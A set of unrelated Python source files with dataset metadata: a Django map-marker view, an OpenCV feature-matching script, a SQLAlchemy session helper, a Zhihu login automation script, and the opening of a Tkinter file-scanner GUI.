"file_name": "model.py", "file_ext": "py", "file_size_in_byte": 7021, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pandas.DataFrame", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.datasets.fetch_openml", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 85, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 124, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 126, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 130, "usage_type": "call"}, {"api_name": "sklearn.impute.SimpleImputer", "line_number": 131, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.compose.ColumnTransformer", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 147, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 150, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_auc_score", "line_number": 174, "usage_type": "call"}, {"api_name": "sklearn.metrics.roc_curve", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.metrics.precision_recall_curve", "line_number": 178, "usage_type": "call"}, {"api_name": "sklearn.metrics.auc", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 183, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 184, "usage_type": "call"}, {"api_name": "sklearn.metrics.average_precision_score", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 203, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 203, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hlines", "line_number": 205, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 205, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "pickle.dump", "line_number": 210, "usage_type": "call"}]}
+{"seq_id": "238273921", "text": "from django.shortcuts import render\n\nfrom about.forms import CommentForm\nfrom about.models import Comment\nfrom map.forms import MarkForm\nfrom map.models import MapMarks\nfrom django.http import JsonResponse\n\ndef Map(request):\n if request.method == \"GET\":\n if request.is_ajax():\n if request.GET[\"type\"] == '1':\n mark = MapMarks.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(mark.first())\n else:\n comment = Comment.objects.filter(id = request.GET[\"id\"]).values()\n return JsonResponse(comment.first())\n else:\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n form_comment = CommentForm()\n form_mark = MarkForm()\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form_comment\": form_comment, \"form_mark\": form_mark})\n else:\n if (request.POST[\"type\"] == 1):\n data = CommentForm(request.POST)\n else:\n data = MarkForm(request.POST, request.FILES)\n\n if (data.data[\"type\"] == '1'):\n comment = Comment()\n comment.comment = data.data[\"comment\"]\n comment.username = data.data[\"username\"]\n comment.id_mark = data.data[\"id_mark\"]\n mark = MapMarks.objects.get(id = data.data[\"id_mark\"])\n comment.save()\n mark.id_comment = mark.id_comment + str(comment.id) + '_'\n mark.save()\n else:\n mark = MapMarks()\n mark.comment = data.data[\"comment\"]\n mark.name = data.data[\"name\"]\n mark.image = data.files[\"image\"]\n mark.position_y = float(data.data[\"position_y\"])\n mark.position_x = float(data.data[\"position_x\"])\n mark.save()\n form = CommentForm()\n form_mark = MarkForm()\n marks = MapMarks.objects.all().values('id', 'position_x', 'position_y')\n return render(request, 'adding-mark/adding-mark.html', {\"marks\": marks, \"form\": form, \"form_mark\": form_mark})", "sub_path": "map/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2090, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "map.models.MapMarks.objects.filter", "line_number": 13, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 13, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 14, "usage_type": "call"}, {"api_name": "about.models.Comment.objects.filter", "line_number": 16, "usage_type": "call"}, {"api_name": "about.models.Comment.objects", "line_number": 16, "usage_type": "attribute"}, {"api_name": "about.models.Comment", "line_number": 16, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 17, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 19, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 19, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 19, "usage_type": "name"}, {"api_name": "about.forms.CommentForm", "line_number": 20, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 21, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 22, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 25, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 27, "usage_type": "call"}, {"api_name": "about.models.Comment", "line_number": 30, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.get", "line_number": 34, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 34, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 34, "usage_type": "name"}, {"api_name": "map.models.MapMarks", "line_number": 39, "usage_type": "call"}, {"api_name": "about.forms.CommentForm", "line_number": 46, "usage_type": "call"}, {"api_name": "map.forms.MarkForm", "line_number": 47, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects.all", "line_number": 48, "usage_type": "call"}, {"api_name": "map.models.MapMarks.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "map.models.MapMarks", "line_number": 48, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 49, "usage_type": "call"}]}
+{"seq_id": "644688010", "text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nimport matcher\nfig = plt.figure()\n\ndef camera_capture():\n cap = cv2.VideoCapture(0)\n\n while True:\n ret, frame = cap.read()\n \n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n fig.add_subplot(1, 2, 1)\n cv2.imshow('bgr', frame)\n fig.add_subplot(1, 2, 2)\n cv2.imshow('gray', gray)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n cap.release()\n\ndef normalized(img):\n # half-sampling\n img = cv2.resize(img, (0, 0), fx = 0.5, fy = 0.5)\n # filter\n kernel_size = 2\n kernel = np.ones((kernel_size, kernel_size), np.float32) / (kernel_size ** 2)\n img = cv2.filter2D(img, -1, kernel)\n return img\n\ndef fast_matching():\n fast = cv2.FastFeatureDetector_create(type = cv2.FastFeatureDetector_TYPE_7_12, nonmaxSuppression = True)\n img_src = cv2.imread('./resource/P_20180407_120033.jpg', 0);\n img_dst = cv2.imread('./resource/P_20180407_120034.jpg', 0);\n\n # normalize\n img_src = normalized(img_src)\n img_dst = normalized(img_dst)\n \n # get keypoints\n kp_src = fast.detect(img_src, None)\n kp_dst = fast.detect(img_dst, None)\n\n # matching\n matchX, matchY, cost_mat = matcher.stable_SSD(img_src, kp_src, img_dst, kp_dst, max_dist = 25)\n dmatch = [cv2.DMatch(i, matchX[i], cost_mat[i][matchX[i]]) for i in range(len(kp_src)) if matchX[i] < len(kp_dst)]\n dmatch.sort(key = lambda x: x.distance)\n \n # draw matches\n img_res = cv2.drawMatches(img_src, kp_src, img_dst, kp_dst, dmatch[:int(0.2 * len(dmatch))], outImg = None, flags = 2)\n \n# fig.add_subplot(1, 2, 1)\n# plt.imshow(img_src)\n# fig.add_subplot(1, 2, 2)\n# plt.imshow(img_dst)\n plt.imshow(img_res)\n\n mng = plt.get_current_fig_manager()\n mng.resize(*mng.window.maxsize())\n\nfast_matching()\nplt.show()\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1920, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "cv2.VideoCapture", "line_number": 8, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 13, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 13, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 18, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "cv2.filter2D", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_create", "line_number": 34, "usage_type": "call"}, {"api_name": "cv2.FastFeatureDetector_TYPE_7_12", "line_number": 34, "usage_type": "attribute"}, {"api_name": "cv2.imread", "line_number": 35, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 36, "usage_type": "call"}, {"api_name": "matcher.stable_SSD", "line_number": 47, "usage_type": "call"}, {"api_name": "cv2.DMatch", "line_number": 48, "usage_type": "call"}, {"api_name": "cv2.drawMatches", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.get_current_fig_manager", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}]}
+{"seq_id": "514508946", "text": "import time\n\nfrom oslo_log import log as logging\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.event import listen\nfrom sqlalchemy.exc import DisconnectionError, OperationalError\nfrom sqlalchemy.orm import sessionmaker\n\nfrom conch import cfg\n\nconf = cfg.CONF.database\nLOG = logging.getLogger(__name__)\n\n_ENGINE = None\n_MAKER = None\n\n\ndef get_session(autocommit=True, expire_on_commit=False):\n global _MAKER\n\n if _MAKER is None:\n engine = get_engine()\n _MAKER = get_maker(engine, autocommit, expire_on_commit)\n\n session = _MAKER()\n return session\n\n\ndef ping_listener(dbapi_conn, connection_rec, connection_proxy):\n try:\n dbapi_conn.cursor().execute('select 1')\n except dbapi_conn.OperationalError as ex:\n if ex.args[0] in (2006, 2013, 2014, 2045, 2055):\n LOG.warn('Got mysql server has gone away: %s', ex)\n raise DisconnectionError(\"Database server went away\")\n else:\n raise\n\n\ndef is_db_connection_error(args):\n conn_err_codes = ('2002', '2003', '2006')\n for err_code in conn_err_codes:\n if args.find(err_code) != -1:\n return True\n return False\n\n\ndef get_engine():\n global _ENGINE\n if _ENGINE is None:\n\n engine_args = {\n \"pool_recycle\": conf.sql_idle_timeout,\n \"echo\": False,\n 'convert_unicode': True,\n \"pool_size\": conf.sql_pool_size,\n \"max_overflow\": conf.sql_max_overflow,\n }\n\n if conf.sql_connection_debug >= 100:\n engine_args['echo'] = 'debug'\n elif conf.sql_connection_debug >= 50:\n engine_args['echo'] = True\n\n _ENGINE = create_engine(conf.sql_connection, **engine_args)\n\n listen(_ENGINE, 'checkout', ping_listener)\n\n try:\n _ENGINE.connect()\n except OperationalError as e:\n if not is_db_connection_error(e.args[0]):\n raise\n\n remaining = conf.sql_max_retries\n if remaining == -1:\n remaining = 'infinite'\n while True:\n msg = ('SQL connection failed. %s attempts left.')\n LOG.warn(msg % remaining)\n if remaining != 'infinite':\n remaining -= 1\n time.sleep(conf.sql_retry_interval)\n try:\n _ENGINE.connect()\n break\n except OperationalError as e:\n if (remaining != 'infinite' and remaining == 0) or \\\n not is_db_connection_error(e.args[0]):\n raise\n return _ENGINE\n\n\ndef get_maker(engine, autocommit=True, expire_on_commit=False):\n return sessionmaker(bind=engine,\n autocommit=autocommit,\n expire_on_commit=expire_on_commit)\n", "sub_path": "conch/db/sqlalchemy/session.py", "file_name": "session.py", "file_ext": "py", "file_size_in_byte": 2830, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "conch.cfg.CONF", "line_number": 11, "usage_type": "attribute"}, {"api_name": "conch.cfg", "line_number": 11, "usage_type": "name"}, {"api_name": "oslo_log.log.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "oslo_log.log", "line_number": 12, "usage_type": "name"}, {"api_name": "sqlalchemy.exc.DisconnectionError", "line_number": 35, "usage_type": "call"}, {"api_name": "sqlalchemy.create_engine", "line_number": 65, "usage_type": "call"}, {"api_name": "sqlalchemy.event.listen", "line_number": 67, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 71, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 83, "usage_type": "call"}, {"api_name": "sqlalchemy.exc.OperationalError", "line_number": 87, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 95, "usage_type": "call"}]}
+{"seq_id": "484197808", "text": "# coding: utf-8\n\nfrom http import cookiejar\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport requests\nimport time\nimport re\nimport json\nimport base64\nimport hmac\nimport hashlib\n\n\nHEADERS = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate, br\",\n \"Accept-Language\": \"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\",\n \"Connection\": \"keep-alive\",\n \"Host\": \"www.zhihu.com\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\",\n}\n\nLOGIN_URL = 'https://www.zhihu.com/signup'\nLOGIN_API = 'https://www.zhihu.com/api/v3/oauth/sign_in'\n\nFORM_DATA = {\n\n \"client_id\": \"c3cef7c66a1843f8b3a9e6a1e3160e20\",\n \"grant_type\": \"password\",\n \"source\": \"com.zhihu.web\",\n \"username\": '',\n \"password\": '',\n \"lang\": \"cn\",\n \"ref_source\": \"homepage\",\n}\n\n\nclass ZHIHULogin(object):\n \n def __init__(self):\n\n self.login_url = LOGIN_URL\n self.login_api = LOGIN_API\n self.login_data = FORM_DATA\n self.session = requests.session()\n self.headers = HEADERS.copy()\n self.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')\n \n\n def login(self, load_cookies=True):\n \n \"\"\"\n 模拟登录知乎\n :param load_cookies: 是否读取上次保存的 Cookies\n :return: bool\n \"\"\"\n if load_cookies and self.load_cookies():\n if self.check_login():\n print('已读取 Cookies 并登录成功')\n return True\n else:\n print('保存的 Cookies 已过期,将重新登录')\n\n\n headers = self.headers.copy()\n xsrf, udid = self._get_token_udid()\n print(self.session.cookies.get_dict())\n headers.update({\n \"x-udid\": udid,\n \"x-xsrftoken\": xsrf,\n 'authorization': 'oauth c3cef7c66a1843f8b3a9e6a1e3160e20',\n })\n headers.update({'origin': 'https://www.zhihu.com','Referer': 'https://www.zhihu.com/signup','Accept': 'application/json, text/plain, */*'})\n self.login_data.update({\n 'username': self._input_data('username', '登录手机'),\n 'password': self._input_data('password', '密码')\n })\n timestamp = str(int(time.time()*1000))\n self.login_data.update({\n \"timestamp\": timestamp,\n \"signature\": self._get_signature(timestamp),\n \"captcha\": self._get_captcha(headers.copy()),\n })\n\n res = self.session.post(self.login_api, data=self.login_data, headers=headers)\n print(self.session.cookies.get_dict())\n print(res.text,res.status_code)\n if '验证码' in res.text:\n print('验证码错误')\n elif self.check_login():\n print('登录成功')\n return True\n print('登录失败')\n return False\n\n\n def load_cookies(self):\n \n \"\"\"\n 读取 Cookies 文件加载到 Session\n :retur\n \"\"\"\n try:\n self.cookies.load(ignore_discard=True)\n except FileNotFoundError:\n print('Cookies.txt 未找到,读取失败')\n else:\n #工具方法转换成字典\n load_cookies = requests.utils.dict_from_cookiejar(self.cookies)\n #工具方法将字典转换成RequestsCookieJar,赋值给session的cookies.\n self.session.cookies = requests.utils.cookiejar_from_dict(load_cookies)\n return True\n return False \n\n def check_login(self):\n \"\"\"\n 检查登录状态,访问登录页面出现跳转则是已登录,\n 如登录成功保存当前 Cookies\n :return: bool\n \"\"\"\n res = self.session.get(self.login_url, headers=self.headers, allow_redirects=False)\n print(res.status_code)\n if res.status_code == 302:\n # self.session.cookies.save()\n #将转换成字典格式的RequestsCookieJar(这里我用字典推导手动转的)保存到LWPcookiejar中\n requests.utils.cookiejar_from_dict({c.name: c.value for c in self.session.cookies}, self.cookies)\n self.cookies.save(ignore_discard=True, ignore_expires=True)\n return True\n return False\n\n def _get_token_udid(self):\n \"\"\"\n 从登录页面获取 token\n :return:\n \"\"\"\n cookies_dict = {}\n token = udid = None\n res = self.session.get(self.login_url,headers=self.headers) \n print(\"请求第一步:状态吗为: %s\" % res.status_code)\n if res.status_code == 200:\n # cookies_dict = requests.utils.dict_from_cookiejar(self.session.cookies)\n cookies_dict = self.session.cookies.get_dict()\n\n if cookies_dict['_xsrf']:\n token = cookies_dict.get('_xsrf')\n if cookies_dict['d_c0']:\n udid = cookies_dict.get('d_c0').split(\"|\")[0].replace(\"\\\"\",\"\")\n print(\"token is % and udis is %s\" % (token,udid))\n return token, udid\n\n\n def _get_captcha(self, headers, lang='cn'):\n \"\"\"\n 请求验证码的 API 接口,无论是否需要验证码都需要请求一次\n 如果需要验证码会返回图片的 base64 编码\n 可选择两种验证码,需要人工输入\n :param headers: 带授权信息的请求头部\n :param lang: 验证码的种类,中文是选倒立汉字,英文是输入字符\n :return: 验证码的 POST 参数\n \"\"\"\n\n if lang == 'cn':\n api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'\n else:\n api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'\n\n if headers.get('x-xsrftoken'):\n headers.pop('x-xsrftoken')\n res = self.session.get(api, headers=headers)\n print(\"请求第二步:状态吗为: %s\" % res.status_code)\n show_captcha = re.search(r'true', res.text)\n if show_captcha:\n put_res = self.session.put(api, headers=headers)\n content = base64.b64decode(josn.loads(put_res)['img_base64'])\n with open('./captcha.png', 'wb') as f:\n f.write(content)\n image = Image.open('./captcha.png')\n if lang == 'cn':\n plt.imshow(img) \n print('点击所有倒立的汉字,按回车提交')\n points = plt.ginput(7)\n capt = json.dumps({'img_size': [200, 44],'input_points': [[i[0]/2, i[1]/2] for i in points]})\n else:\n img.show()\n capt = input('请输入图片里的验证码:')\n \n # 这里必须先把参数 POST 验证码接口\n self.session.post(api, data={'input_text': capt}, headers=headers)\n return capt\n else:\n print(\"验证码False\")\n return ''\n\n\n def _get_signature(self, timestamp):\n \"\"\"\n 通过 Hmac 算法计算返回签名\n 实际是几个固定字符串加时间戳\n :param timestamp: 时间戳\n :return: 签名\n https://static.zhihu.com/heifetz/main.app.268c34bc2abd4304ea97.js\n \"\"\"\n ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)\n grant_type = self.login_data['grant_type']\n client_id = self.login_data['client_id']\n source = self.login_data['source']\n # 顺序不能错\n ha.update(bytes((grant_type + client_id + source + timestamp), 'utf-8'))\n signature = ha.hexdigest()\n print('签名字符串为:%s' % signature)\n return signature\n\n def _input_data(self, key, data_name):\n \"\"\"\n 用于手动输入指定 form_data 参数\n :param key: 键名\n :param data_name: 用于输入提示中文名\n :return: 输入的值\n \"\"\"\n value = self.login_data.get(key)\n if not value:\n value = input('请输入{}:'.format(data_name))\n return value\n\n\nif __name__ == '__main__':\n account = ZHIHULogin()\n account.login()\n # 登陆成功后请求如下页面测试\n # headers 里保留到如下即可正常 否则出现乱码\n # h: {'Host': 'zhuanlan.zhihu.com', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0', 'Referer': 'https://www.zhihu.com/'}\n # res = s.get('https://zhuanlan.zhihu.com/p/35986817',headers=h)\n", "sub_path": "zhihu/login.py", "file_name": "login.py", "file_ext": "py", "file_size_in_byte": 8474, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "requests.session", "line_number": 47, "usage_type": "call"}, {"api_name": "http.cookiejar.LWPCookieJar", "line_number": 49, "usage_type": "call"}, {"api_name": "http.cookiejar", "line_number": 49, "usage_type": "name"}, {"api_name": "time.time", "line_number": 80, "usage_type": "call"}, {"api_name": "requests.utils.dict_from_cookiejar", "line_number": 111, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 111, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 113, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 113, "usage_type": "attribute"}, {"api_name": "requests.utils.cookiejar_from_dict", "line_number": 128, "usage_type": "call"}, {"api_name": "requests.utils", "line_number": 128, "usage_type": "attribute"}, {"api_name": "re.search", "line_number": 173, "usage_type": "call"}, {"api_name": "base64.b64decode", "line_number": 176, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 179, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ginput", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 184, "usage_type": "call"}, {"api_name": "hmac.new", "line_number": 205, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 205, "usage_type": "attribute"}]}
+{"seq_id": "194213413", "text": "#File Scanner\r\n#Made by Jack Carmichael\r\n\"\"\"\r\n===================================================================================\r\nObject--------------------Parameters--------------------Inheritance\r\n -AppWindow() -void -object\r\n -FileInfo() -frame -object\r\n -CurrentFileInfo() -frame -object\r\n -AcanGui() -file_listboxes,progress_bar -object\r\n -ProgressBar() -frame,length,height -TkinterWrapper.WindowCanvas\r\n -Scan() -directory,scan_gui -object\r\n -FIleType() -file_extension,file_consensus -object\r\n -FileTypeEditor() -parrent_window,edit_type -object\r\n -SetDirWindow() -parent_window -object\r\n -DirectoryListbox() -frame,companion_text_entry -TkinterWrapper.WindowListbox\r\n -ComputerDirectory() -void -object\r\n -SavedInfo() -void -object\r\n===================================================================================\r\nStill to do:\r\n -bind left click event with filetype listboxes. Options are to add to file type list\r\n\"\"\"\r\n\r\nimport os\r\nimport time\r\nfrom functools import partial\r\nimport UserErrorMessage\r\nimport TkinterWrapper\r\nimport FileWrapper\r\n\r\nALAPHABET=\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\r\nUP_TRIANGLE=\"{0}\".format('\\u25B2')\r\nDOWN_TRIANGLE=\"{0}\".format('\\u25BC')\r\nLEFT_TRIANGLE=\"{0}\".format('\\u25C0')\r\nRIGHT_TRIANGLE=\"{0}\".format('\\u25B6')\r\nSMALL_RIGHT_TRIANGLE=\"{0}\".format('\\u25B8')\r\n\r\n#SPLIT UP! Make information frame a class and call update methods on it\r\nclass AppWindow(object):\r\n def __init__(self):\r\n self.app_window=TkinterWrapper.Window(\"File Scanner\")\r\n self.update_scan_flags(False,False,False)\r\n self.__setup_window()\r\n self.__setup_menu()\r\n self.__setup_frames()\r\n self.update_frames()\r\n self.app_window.start_mainloop()\r\n\r\n def __setup_window(self):\r\n self.app_window.remove_min_max_buttons(False)\r\n self.app_window.resizable(False,False)\r\n\r\n def __setup_menu(self):\r\n self.menu=TkinterWrapper.WindowMenu(self.app_window.get_window())\r\n self.file_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.file_cascade.add_item_to_cascade(\"Quit\",self.app_window.destroy_window)\r\n self.edit_cascade=TkinterWrapper.WindowMenuCascade(self.app_window.get_window(),False)\r\n self.edit_cascade.add_item_to_cascade(\"Known-Good Filetypes\",partial(self.add_known_file_type,\"KnownGood\"))\r\n self.edit_cascade.add_item_to_cascade(\"Known-Bad Filetypes\",partial(self.add_known_file_type,\"KnownBad\"))\r\n self.menu.add_cascade_to_menu(\"File\",self.file_cascade.get_cascade())\r\n self.menu.add_cascade_to_menu(\"Edit\",self.edit_cascade.get_cascade())\r\n\r\n def __setup_frames(self):\r\n self.process_information_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.found_files_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n self.current_file_frame=TkinterWrapper.WindowFrame(self.app_window.get_window())\r\n for item in [[self.process_information_frame,\"top\"],[self.current_file_frame,\"top\"],[self.found_files_frame,\"top\"]]:\r\n item[0].pack_frame(item[1],0,0)\r\n self.file_information_frame=FileInfo(self.found_files_frame.get_frame())\r\n self.current_file_information_frame=CurrentFileInfo(self.current_file_frame)\r\n\r\n def update_frames(self):\r\n self.process_information_frame.destroy_all_child_widgets()\r\n self.update_process_information_frame()\r\n self.file_information_frame.update_frame(self.directory_set,self.process_running,self.scan_finished)\r\n self.current_file_information_frame.update_frame(self.process_running)\r\n\r\n def update_process_information_frame(self):\r\n if self.process_running==False and self.directory_set==False and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Please select a folder to scan.\",\"Set Search Folder\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==False and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_idle(\"Set to scan: {0}\".format(saved_information.get_directory_to_scan()),\"Scan\",self.commence_scan)\r\n self.add_button_to_process_information_frame(\"Change Folder To Scan\",self.open_dir_selection_dialogbox)\r\n elif self.process_running==True and self.directory_set==True and self.scan_finished==False:\r\n self.update_process_information_frame_for_task()\r\n elif self.process_running==False and self.directory_set==False and self.scan_finished==True:\r\n self.update_process_information_frame_for_idle(\"Scan Completed\",\"Scan Something Else\",self.open_dir_selection_dialogbox)\r\n\r\n def update_process_information_frame_for_idle(self,top_text,button_text,button_action):\r\n label=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"{0}\".format(top_text))\r\n label.configure_colors(\"dodgerblue2\",\"grey95\",\"times 11\")\r\n label.pack_label(\"top\",0,0)\r\n self.add_button_to_process_information_frame(button_text,button_action)\r\n def add_button_to_process_information_frame(self,button_text,button_action):\r\n button=TkinterWrapper.WindowButton(self.process_information_frame.get_frame(),\"{0}\".format(button_text),button_action)\r\n button.pack_button(\"top\",0,1)\r\n\r\n def update_process_information_frame_for_task(self):\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning....\")\r\n top_text.configure_colors(\"grey20\",\"grey95\",\"times 14\")\r\n top_text.pack_label(\"top\",0,0)\r\n top_text=TkinterWrapper.WindowLabel(self.process_information_frame.get_frame(),\"Scanning: {0}\".format(saved_information.get_directory_to_scan()))\r\n top_text.configure_colors(\"dodgerblue2\",\"grey95\",\"times 10\")\r\n top_text.pack_label(\"top\",0,0)\r\n self.progress_bar=Progressbar(self.process_information_frame.get_frame(),400,30)\r\n\r\n def add_known_file_type(self,type_consensus):\r\n dialog_box=FileTypeEditor(self.app_window.get_window(),type_consensus)\r\n\r\n def open_dir_selection_dialogbox(self):\r\n directory_selection=SetDirWindow(self.app_window.get_window())\r\n if directory_selection.get_saved_directory!=\"\":\r\n saved_information.set_directory_to_scan(directory_selection.get_saved_directory())\r\n self.update_scan_flags(True,False,False)\r\n self.update_frames()\r\n\r\n def commence_scan(self):\r\n self.update_scan_flags(True,True,False)\r\n self.update_frames()\r\n scan_gui=ScanGUI(self.file_information_frame.get_listboxes(),self.progress_bar,self.current_file_information_frame)\r\n self.scan=Scan(saved_information.get_directory_to_scan(),scan_gui)\r\n self.scan.start()\r\n scan_gui.start_checking_for_selection()\r\n 